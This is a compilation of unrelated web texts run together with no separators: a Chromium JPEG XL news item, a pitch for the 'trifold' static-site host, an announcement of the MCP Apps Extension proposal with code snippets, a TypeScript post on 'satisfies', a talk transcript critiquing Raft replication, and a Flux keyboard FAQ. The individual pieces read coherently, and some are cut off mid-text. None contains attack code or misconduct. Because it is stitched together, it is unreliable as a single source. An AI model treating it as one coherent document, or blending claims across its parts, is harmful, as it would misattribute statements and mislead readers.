Before Google ships the feature in Chrome, the company wants the integration to be secure and supported over time.
Chrome JPEG XL implementation adds animation support
A developer has submitted new code that reintroduces JPEG XL to Chromium. This version is marked as feature complete. The developer
said
it also “includes animation support,” which earlier implementations did not offer. The code passes most of Chrome’s automated testing, but it remains under review and is not available to users.
The featured image is taken from an unlisted developer demo created for testing purposes.
JPEG XL is a newer image format intended as a replacement for traditional JPEG files. It can reduce file size without loss in visual quality. This may help web pages load faster and reduce data usage. More details are available on the
official JPEG XL website
.
Google has not provided a timeline for JPEG XL support in Chrome. Users cannot enable the format today, but development has restarted after years without progress.
trifold is a tool to quickly & cheaply host static websites using a CDN
I built this to replace my Netlify* workflow for dozens of small static sites & thought others might find it useful. A single config file and you can trifold publish to your heart's content. Unlike free options** it requires a bunny.net CDN account, but you can host as many of your static sites ...
This allows painless deployment of sites consisting entirely of static assets (HTML, CSS, JS, images) for pennies a month.
It is the perfect companion to deploy sites built with static-site generators like
Hugo
,
Zola
,
Quarto
, or
zensical
.
The tool provides a simple CLI that allows:
initializing new projects without touching the CDN web interface
syncing local HTML/CSS/JS/etc. to the CDN & clearing the cache
configuring a custom domain name to point at your files, with SSL enabled
setting a maximum monthly cost to avoid surprise bills
using CDN edge functions to support redirects
This project grew out of frustration with services making their free tier less friendly to indie devs and students that just need a cheap & reliable place they can host things.
trifold
offers an easy alternative to services like Cloudflare Pages, Netlify, and GitHub pages.
Instead of relying on a free service it is hopefully going to be more stable to rely on a paid service with a reasonable price point and the ability to set billing limits.
At the moment
bunny.net
1
is the only supported provider, but others can be added.
bunny.net is a professional-grade CDN that is also very affordable.
Like most hosts, they charge for both storage & bandwidth.
Both start at $0.01/GB/mo.
The typical static website is under 1GB, meaning storage costs will be negligible unless you decide to host audio/video. And if you do, the rates are
far
cheaper than most competitors, see their
pricing
for details.
In terms of bandwidth, let's say your page size is 2MB (a moderate-sized page) and hits the front page of a popular website, driving a surge of 25,000 hits. (
Congrats!
)
Not only will your site handle the traffic just fine, your total bill will be
$0.50 for the 50GB of bandwidth used.
(You could serve a million hits, ~2TB, for $20.)
Of course, most sites will only get a fraction of this traffic.
It is possible to host dozens of low-traffic sites for the $1 monthly minimum bill.
Today we’re introducing the proposal for the
MCP Apps Extension
(
SEP-1865
) to standardize support for interactive user interfaces in the Model Context Protocol.
This extension addresses one of the most requested features from the MCP community and builds on proven work from
MCP-UI
and
OpenAI Apps SDK
- the
ability for MCP servers to deliver interactive user interfaces to hosts
.
MCP Apps Extension introduces a standardized pattern for declaring UI resources, linking them to tools, and enabling bidirectional communication between embedded interfaces and the host application.
The SEP was authored by MCP Core Maintainers at OpenAI and Anthropic, together with the MCP-UI creators and lead maintainers of the MCP UI Community Working Group.
Standardization for interactive interfaces
Currently, MCP servers are limited to exchanging text and structured data with hosts. While this works well for many use cases, it creates friction when tools need to present visual information or gather complex user input.
For example, consider a data visualization MCP server that returns chart data as JSON. The host application must interpret that data and render it. Handling all kinds of specialized data in this scenario translates to a significant burden for client developers, who would need to build their own logic to render the UI. As more UI requirements come up, like the need to collect multiple related settings from users, the complexity balloons. Alternatively, without UI support, these interactions become awkward exchanges of text prompts and responses.
The MCP community has been creative in working around these limitations, but different implementations using varying conventions and architectures make it harder for servers to work consistently across clients. This lack of standardization creates a real risk of ecosystem fragmentation - something we’re working to proactively prevent.
Building together
The
MCP-UI project
, created by
Ido Salomon
and
Liad Yosef
and maintained by a dedicated community, spearheaded the vision of agentic apps with interactive interfaces. The project developed patterns for delivering rich user interfaces as first-class MCP resources, proving that agentic apps fit naturally within the MCP architecture. The project is backed by a large community and provides
rich SDKs
, adopted at leading companies and projects such as Postman, Shopify, Hugging Face, Goose, and ElevenLabs.
The
OpenAI Apps SDK
further validated the demand for rich UI experiences within conversational AI interfaces. The SDK enables developers to build rich, interactive applications inside ChatGPT using MCP as its backbone. To ensure interoperability and establish consistent security and usage patterns across the ecosystem, Anthropic, OpenAI, and MCP-UI are collaborating to create an official MCP extension for interactive interfaces.
MCP Apps Extension specification
We’re proposing a specification for UI resources in MCP, but the implications go further than just a set of schema changes. The MCP Apps Extension is starting to look like an agentic app runtime: a foundation for novel interactions between AI models, users, and applications. The proposal is intentionally lean, starting with core patterns that we plan on expanding over time.
Key design decisions
Pre-declared resources
UI templates are resources with the
ui://
URI scheme, referenced in tool metadata.
// Server registers UI resource
{
  uri: "ui://charts/bar-chart",
  name: "Bar Chart Viewer",
  mimeType: "text/html+mcp"
}

// Tool references it in metadata
{
  name: "visualize_data_as_bar_chart",
  description: "Plots some data as a bar chart",
  inputSchema: {
    type: "object",
    properties: {
      series: { type: "array", items: .... }
    }
  },
  _meta: {
    "ui/resourceUri": "ui://charts/bar-chart"
  }
}
This approach enables hosts to prefetch and review templates before tool execution, improving both performance and security. It also separates static presentation (the template) from dynamic data (tool results), enabling better caching.
MCP transport for communication
Instead of inventing a custom message protocol, UI components communicate with hosts using existing MCP JSON-RPC base protocol over
postMessage
. This means that:
UI developers can use the standard
@modelcontextprotocol/sdk
to build their applications
All communication is structured and auditable
Future MCP features automatically work with the UI extension
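As a rough sketch of what this looks like from inside a UI (the exact method names and message shapes are defined by the SEP, so treat this as illustrative rather than normative; the tool name is borrowed from the example above), an embedded interface could ask its host to invoke a tool by posting an ordinary JSON-RPC request to the parent frame:

// Inside the sandboxed iframe: send a JSON-RPC request to the host.
// The host can log and audit the message, ask for user consent, and
// then forward the approved request to the MCP server.
const request = {
  jsonrpc: "2.0",
  id: 1,
  method: "tools/call",
  params: {
    name: "visualize_data_as_bar_chart",
    arguments: { series: [3, 1, 4, 1, 5] },
  },
};
window.parent.postMessage(request, "*");

// Responses arrive the same way, as JSON-RPC messages from the host.
window.addEventListener("message", (event) => {
  const message = event.data;
  if (message?.jsonrpc === "2.0" && message.id === 1) {
    console.log("tool result", message.result);
  }
});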
Starting with HTML
The initial extension specification supports only
text/html
content, rendered in sandboxed
iframes
. This provides:
Universal browser support
Well-understood security model
Screenshot and preview generation capabilities
A clear baseline for future extensions
Other content types such as external URLs, remote DOM, and native widgets are explicitly deferred to future iterations.
Security-first
Hosting interactive content from MCP servers requires careful security consideration. The proposal addresses this through multiple layers:
Iframe sandboxing
: All UI content runs in sandboxed iframes with restricted permissions
Predeclared templates
: Hosts can review HTML content before rendering
Auditable messages
: All UI-to-host communication goes through loggable JSON-RPC
User consent
: Hosts can require explicit approval for UI-initiated tool calls
These mitigations create defense in depth against malicious servers while preserving the flexibility developers need.
Backward compatibility
MCP Apps is an optional extension. Existing implementations continue working without changes, and hosts can gradually adopt UI support at their own pace. Servers should provide text-only fallback for all UI-enabled tools and return meaningful content even when UI is unavailable, so they can serve both UI-capable and text-only hosts.
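For example, a UI-enabled tool and its result might look roughly like this (the shapes follow the earlier snippet; the text fallback and example values are illustrative, not prescribed by the proposal):

// Sketch: a tool that declares a UI template but still returns a
// useful plain-text result, so text-only hosts get meaningful output.
const tool = {
  name: "visualize_data_as_bar_chart",
  description: "Plots some data as a bar chart",
  inputSchema: {
    type: "object",
    properties: { series: { type: "array", items: { type: "number" } } },
  },
  _meta: { "ui/resourceUri": "ui://charts/bar-chart" },
};

// The result carries the dynamic data for the UI plus a text fallback
// that a host can show instead of rendering the template.
const result = {
  content: [{ type: "text", text: "Bar chart of 5 values (min 1, max 5)." }],
  structuredContent: { series: [3, 1, 4, 1, 5] },
};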
What’s next
The
UI Community Working Group
has been instrumental in shaping this proposal through extensive feedback and discussion. We have built an
early access SDK
to demonstrate the patterns and types described in the specification proposal. The
MCP-UI
client and server SDKs support these patterns.
If you are interested in contributing to this effort, we invite you to:
Test prototype implementations and share your experience
Acknowledgements
This proposal wouldn’t exist without the work of the maintainers at MCP-UI, OpenAI, and Anthropic.
Ido Salomon
and
Liad Yosef
, through MCP-UI and moderation of
#ui-wg
, incubated and championed many of the patterns that MCP Apps now standardizes, and together with contributors demonstrated that UI resources can be a natural part of MCP.
Sean Strong
,
Olivier Chafik
,
Anton Pidkuiko
, and
Jerome Swannack
from Anthropic helped steer the initiative and drive the collaboration.
Nick Cooper
,
Alexei Christakis
, and
Bryan Ashley
from OpenAI have provided valuable direction from their experience building the Apps SDK.
Special thanks to the
UI Community Working Group
members and everyone who contributed to the discussions that shaped this proposal.
I’ve been doing a lot of work in TypeScript lately, and with that I’ve spent quite a bit of time learning more about its type system. TypeScript is a wonderfully advanced language though it has an unfortunately steep learning curve; in many ways it’s the complete opposite of Go.
One confusing thing about TypeScript is that it doesn’t always infer the most precise type possible. As an example:
// name is of type "Jerred"
const name = "Jerred";

// person1 is of type { name: string }
const person1 = {
  name: "Jerred",
};

// person2 is of type { readonly name: "Jerred" }
const person2 = {
  name: "Jerred",
} as const;
Why is the name of
person1
of type
string
and not the literal
"Jerred"
? Because the object
could
be mutated to contain any other string.
What happens when I want to pass those objects to a function that requires
name
to be
"Jerred"
?
function handleJerred(name: "Jerred") {
  // do something
}

// these are okay
handleJerred(name);
handleJerred(person2.name);

handleJerred(person1.name);

Argument of type 'string' is not assignable to parameter of type '"Jerred"'.
As we’d expect, the types don’t match up. The most obvious way is to annotate the variable declaration with the expected type:
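For example (person3 here is just an illustrative name):

// Annotating the declaration keeps `name` at the literal type "Jerred"
const person3: { name: "Jerred" } = {
  name: "Jerred",
};

handleJerred(person3.name); // okay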
We could also use the
satisfies
keyword. This keyword is a bit esoteric and not very common, but it comes in handy in some scenarios where you’d otherwise pull your hair out.
satisfies
is an alternative to an explicit variable type annotation. It tells TypeScript that your assignment should be
at least
assignable to the provided type. It’s kind of like a type-safe way to cast values.
The benefit of
satisfies
over a variable type annotation is that it lets TypeScript infer a more specific type based on the value provided. Consider this scenario:
type Person = {
  name: string;
  isCool: boolean;
};

function coolPeopleOnly(person: Person & { isCool: true }) {
  // only cool people can enter here
}

const person1: Person = {
  name: "Jerred",
  isCool: true,
};

// okay, so we need to say that `isCool` is true
coolPeopleOnly(person1);

Argument of type 'Person' is not assignable to parameter of type 'Person & { isCool: true; }'.
  Type 'Person' is not assignable to type '{ isCool: true; }'.
    Types of property 'isCool' are incompatible.
      Type 'boolean' is not assignable to type 'true'.
// and we also need to include the name field...
const person2: { isCool: true } = {
  name: "Jerred",
  isCool: true,
};

Object literal may only specify known properties, and 'name' does not exist in type '{ isCool: true; }'.
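A sketch of the satisfies version (person3 is just an illustrative name):

const person3 = {
  name: "Jerred",
  isCool: true,
} satisfies Person & { isCool: true };

// isCool is inferred as the literal type `true`, so this now compiles:
coolPeopleOnly(person3);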
TypeScript will ensure that your value is assignable to your type. The type of the assigned variable will be made based on the type of the value instead of the type provided to
satisfies
.
This really comes in handy when you want to ensure that TypeScript is being as specific as possible.
This talk is an extension of my earlier
Data Replication Design Spectrum
blog post. The blog post was the analysis of the various replication algorithms, which concludes with showing that Raft has no particular advantage along any easy analyze/theoretical dimension. This builds on that argument to try and persuade you out of using Raft and to supply suggestions on how to work around the downsides of quorum-based or reconfiguration-based replication which makes people shy away from them.
Video
Transcript
Hi folks. I’m here to try and convince you to consider options other than Raft.
Raft, or just leadered consensus in general and I’m using the two interchangeably in this talk, has emphatically won both on actual usage in databases by my somewhat haphazard survey…
And even more subjectively it’s won by mindshare. Any discussion I see of replication is always about raft. (and this is edited, throughout this whole talk, I’m not trying to subtweet any one person/project/whatever) But it’s always Raft. Or multi-paxos. Or that viewstamped replication should be the one true replication algorithm. And this grates on me, because if you’re choosing between three options, those aren’t even the right three to be considering.
I claim there’s three classes of replication algorithms
[1]
: Quorums, Reconfiguration, and leadered consensus as a hybrid of the two, and that all replication algorithms can be placed along a single axis which classifies them based upon how they handle failures. With quorums, the loss of any member of the replication group can be tolerated, and replication continues on. Think Cassandra. With reconfiguration, the write-all-read-one replication halts on a failure, and continues once the failed node has been automatically replaced. Historically, this is like MySQL with failover. And finally our overused Raft exists as a hybrid of the two: the followers act like quorum replication, but having a leader bumps it one tick towards reconfiguration.
[1]: This is the one slide summary of what
Data Replication Design Spectrum
tries to pitch in terms of classification.
And so this talk is framed as trying to argue my hypothetical arch-nemesis out of their mental model that Raft is the absolute best and always the correct default option, and anything else should only be used begrudgingly in some
very
specific cases. I’m actually trying to get to the argument of: please just use the best suited replication algorithm, but that’s going to involve some Raft bashing while sprinkling in advice on how to succeed in a non-raft world.
So let’s get started.
We’re going to first tackle the broad argument that raft is just uniformly superior. And if you tell me it’s best, I want to know, it’s best at… what?
If it’s the best at something, I should be able to sit down, and do the math of how it acts along some dimensions versus the alternatives, and show, inarguably, that raft delivers better
something
than the alternatives. But I’ve done that math. I have a blog post which calculates Quorums, Raft, and Reconfiguration along these dimensions, with every notable variant or proposed raft optimization factored in.
And that post shows: Raft isn’t better. In every category, it’s at best tied, and at worst, it’s the worst. Most distributed database deployments I’ve worked with have been storage bound, and that 40% higher storage efficiency for reconfiguration can mean a lot of money. Or if you care about availability, on paper, leaderless Paxos gives you better tail latencies with less availability blips than Raft. So the math isn’t justifying Raft’s absurd popularity.
There’s also this draw to Raft that it’s great because of its simplicity. It’s simpler than Multi-Paxos, for sure, it did a great job at that.
But in the broader picture, Raft isn’t simpler. Quorums have different replicas with different states and different orders of operations, causing an explosion of states to check for correctness. But once you’ve handled that, all distributed systems problems of slowness, failures, partitions, what-have-you all look the same.
Reconfiguration is the opposite. I’ve worked on FoundationDB, a very reconfiguration-based database, and whenever some code sends an RPC, either it gets a reply or everyone gets killed and the system resets. All the code is happy-path only, as all failures get pushed through one reconfiguration process. It’s beautifully simple. But gray failures are hard, and having to precisely answer “is this other replica sufficiently alive?” is the challenge that Reconfiguration gains instead.
And Raft is both of these things, so not only do you have to have a well-integrated failure detector for the leader, but you also have a tremendous state space to search in which bugs could be hiding from the quorum of followers. It’s not simpler.
One could argue "Raft is better than Reconfiguration because Reconfiguration has unavailability!"
This is the reconfiguration counter-argument I have encountered the most often, and this is my least favorite argument, because it’s like a matryoshka of misunderstandings.
First, If you’re so upset about unavailability, what happens when the leader dies in raft? Request processing halts, there’s a timeout, a reconfiguration process (leader election), and requests resume.
What happens when you use reconfiguration and a replica dies? Request processing halts, there’s a timeout, a reconfiguration process, and requests resume. It’s literally the same diagram. I just deleted some nodes. If you’re upset about this slide, you
have to
be equally upset about the last slide too.
Furthermore, if we’re talking about replicating partitions of data, then leadership gets distributed across every machine to balance resource usage as leaders do more work. So when a machine fails, some percentage of your data is going to be "unavailable", we’re only arguing about exactly what that percent is. So, no.
Furthermore, it’s an argument based out of a bad definition of the word availability. Unavailability is when requests have latency above a given threshold. If the reconfiguration process happens within your latency threshold, it’s not unavailability.
The
Huawei Taurus paper
has an argument for reconfiguration-based replication in this vein, which is a bold argument and I love it.
They’re building replication for a write ahead log, and are making a case here about their write availability for appending a new log segment.
They say:
We can identify a failure quickly.
Our reconfiguration process is fast.
The chance of us being unable to find 3 new working nodes is effectively 0.
Therefore our chance of being unavailable is effectively 0%.
And that’s the correct way to look at availability. You can hate this argument, you can still poke some minor holes in it, but they’re not wrong.
There is a correct counter-argument here, and it’s that you cannot solve consensus with two failures using three nodes. So when raft is electing a new leader or changing its replicas, it can do that itself. Reconfiguration-based replication needs some external consensus service to lean on. But the options of what you can use for that are ever more plentiful. With S3 supporting compare-and-swap now, you can even use S3 as your consensus service. But this is a design requirement difference from Raft.
For concrete advice on how to build systems using an external consensus service to manage membership, the
PacificA paper
gives a very nice description of how to do this, and how to manage an automatic failover and reconfiguration process safely. It has already been directly adopted by Elasticsearch, and Kafka’s replication is very similar in spirit.
Moving onto the Quorums side, one could argue "Raft is better than Quorums because Quorums livelock on contention!"
Simple majority quorums doesn’t livelock, so we’re talking about leaderless consensus here only, and this is a known concern. But there’s ways to minimize or work around this issue.
[2]
[2]: Unmentioned in this talk is "just put the replicas closer together", like
Tencent’s PaxosStore
, because that’s not as general of advice.
First, don’t keep the raft mental model that operations need to go into a log, and all operations need to go into
one
log. Target your operations to the specific entity or entities that you’re modifying, so that you contend only on what you actually need to.
You don’t even need to materialize a log if you don’t need a log.
Compare-and-Swap Paxos
, just models evolving your entity from one state to the new state with no “put things into a log” step in-between. And it’s a great example of being simpler than Raft — Denis’s example implementation with membership changes is 500 lines of code.
If you’re looking for a weekend “implement consensus” project, this is what I’d recommend doing.
Second, and this is the trick I see applied the least often, but remember that even when modifying the same entity, you don’t need to have all replicas agree on an ordering for commutative operations — those which yield the same result regardless of what order they’re performed in. Increments are the easiest example. Every replica agrees that at the end it’s a net plus six here, and this is safe to do as long as no one sees an intermediate result.
Permitting commutative operations to commit concurrently while banning reads requires cooperation from your concurrency control layer too. You can read about increment locks in database textbooks, but
escrow transactions
is the most fun. If I try to deposit $100 and withdraw $100 from my bank account, those might be commutative operations. If I have
zero
dollars, it matters if the withdrawal gets ordered before the deposit. If I’m a billionaire, it doesn’t matter. Escrow Transactions pitches how to handle even these sorts of "conditionally commutative" situations so that you can get your contention down as low as possible.
Lastly, the livelock stems from inconsistent ordering of requests across replicas, and you can also take a dependency on physical clocks to help consistently order requests instead. There’s an
E-Paxos Revisited
[3]
paper which gives a focused pitch on this idea as well, but I’d strongly suggest checking out
Accord
, Cassandra’s new strictly serializable transaction protocol, that’s an industry implementation of leaderless consensus, and avoiding livelock by leaning on a physical time based ordering.
[3]: E-Paxos is the classic example of targeting only the entities one wishes to modify within paxos, but there’s aspects of it which haven’t been fully scoped out for real-world implementation. Most of these are centered around that E-Paxos maintains a DAG of operations (where edges are conflicts) which makes a number of aspects of a real system (e.g. replica catchup or garbage collection) significantly harder to do efficiently. I only know of Cassandra having an implementation of it which was never merged, and they ended up going towards extending E-Paxos into Accord instead.
So to wrap this up, I’m not here to pitch you that Raft
never
has a use. Going through these arguments was to show that there are limitations to Quorums and Reconfiguration, and talk about how you can best work around those limitations. But each side has a critical flaw, and the one advantage that Raft uniquely has is its unrelenting, unwavering mediocrity. It is less efficient, it is less “available”, and it is more complicated, but there’s no situation in which Raft isn’t an “okay” solution. It’s a safe choice. But, broadly, categorically, and littered with minor factual issues, not using Raft gets you a system that’s better at something.
So the mental model I’d like to leave you with is:
Use Quorums or Raft if you can’t have any other supporting service to help with group membership.
Use Reconfiguration or Raft if you must handle high, single-item contention.
If you need both of these things, then you might have to use Raft. But using Raft is your punishment. You’re forced to use a resource in-efficient, complex solution, because your design constraints left you with no wiggle room.
Please use the replication algorithm that best fits your use case. It’s possible that is Raft. That’s fine. But reconfiguration is 40% cheaper by instance count than Raft. If I go to your database’s users and ask if they’re fine with slightly higher tail latency in exchange for 40% off their hardware cost, how many are going to say no? Or if tail latency is really that important to them, would they not be happier with Quorums? Use what fits your users' needs the best.
If you’re interested in some further food for thought here, looking at
disaggregated OLTP systems
is a really interesting replication case study. Each of the major vendors chose a completely different replication solution, and so if you read through the series of papers you see what effects those choices had, and get to read the criticisms that the later papers had of the earlier ones' decisions.
Pre-orders on this website will ship according to your selected batch. In stock orders will become available after pre-orders have been fulfilled.
The keyboard features a USB-C port on both sides of the device to add on any peripheral such as an external numpad if desired. We plan to release a matching numpad add-on in the future.
Any pre-existing hotkey bindings will function in
any software
and a custom layout can be made to support it. By
default
the following layouts will be included at launch with more to come over time:
Adobe Photoshop
Adobe Illustrator
Adobe After Effects
Adobe Premiere Pro
Adobe Lightroom
Ableton Live
Autodesk 3ds Max
Autodesk Fusion 360
Autodesk Maya
Blender
Cinema 4D
Davinci Resolve
Discord
Figma
Final Cut Pro
FL Studio
Jetbrains IntelliJ
Logic Pro
Microsoft Excel
Microsoft Outlook
Microsoft Powerpoint
OBS Studio
SolidWorks
Steinberg Cubase
Unity
Unreal Engine 4/5
Visual Studio Code
Microsoft Visual Studio
Windows 10/11
macOS 11+ (Note: application volume mixing not available for macOS)
Linux / Android / iOS – Limited compatibility (see FAQ regarding operation without installed software)
Full Linux compatibility is planned but may not be available at launch.
In order to customise and configure the keyboard, the provided Flux Polymath software must be used. However, once a configuration is loaded onto the keyboard’s on-board memory it can be used even on computers that do not have the Flux Polymath software installed. Shortcuts and custom macros consisting of combination keypresses will also still function as well as manual switching between profiles. However, more advanced functionality such as automatic layout switching based on the active window and certain application specific features such as album art and track information for music will not be available if the utility is not installed.
Due to the position of the sensors ortho layouts will not be available. We hope to do a separate ortho split model in the future and the best way to make that happen is to let people know about this product.
Analog hall effect sensors are the best type of sensor for gaming, as they allow for an adjustable actuation point and rapid-trigger functionality, which provides some advantages for rapid direction changes or in rhythm games. Polling rate is 1000 Hz with 1-2 ms latency; however, the performance may exceed that of higher-polling keyboards, as most real-world latency comes from key travel time and debounce.
The keys contain magnets along their perimeter which are attracted by magnets in the frame which surrounds them. This magnetic attraction suspends them in place and provides the return force which makes the key bounce back after depressing – similar to a spring.
No, the keyboard does not function as a touchscreen. This means there is no accidental actuation from resting fingers on the keys.
No, the keyboard is not recognised as a display device by the host computer operating system. It is driven by its own independent efficient embedded microprocessor to provide a more seamless user experience and compatibility with more devices. Also your mouse cursor will never get lost on your keyboard.
No, there is a mechanical end stop built into the frame which prevents keys from hitting the screen.
You will need 1x USB-A or USB-C 2.0 with a minimum power delivery of 5V 1.5A. If you plan to use additional peripherals connected to the keyboard 5V 3A is recommended. The keyboard features a USB-C receptacle for removable cable. If your computer’s USB ports are unable to provide this, a 5V 3A USB-C power supply/charger (sold separately) can be used along with the included USB Y cable.
Yes you can play video files on this, there is 8GB of inbuilt storage for wallpapers and icons. You can easily fit a few 1080p feature length films.
The removable frame allows easy access to the gaps under the keys where dirt generally gathers on a normal keyboard, making cleaning much easier. The frame itself is also totally passive with no electronics within it.
The Flux Keyboard is infinitely customisable, any image or video can be used as a wallpaper with some interactive styles as well. The key legends/symbols and mapping are also completely customisable with support for macros.
Frames will be available in:
ANSI 84 Key layout
ISO 85 Key layout
The keyboard’s base is compatible with any frame, so it is possible to swap between these layouts if you wanted to.
At launch two switch types will be available:
Tactile 55g
Linear 45g
The weight can be modified by changing the magnets to magnets of a different strength grade and more varieties are planned to be made available in the future.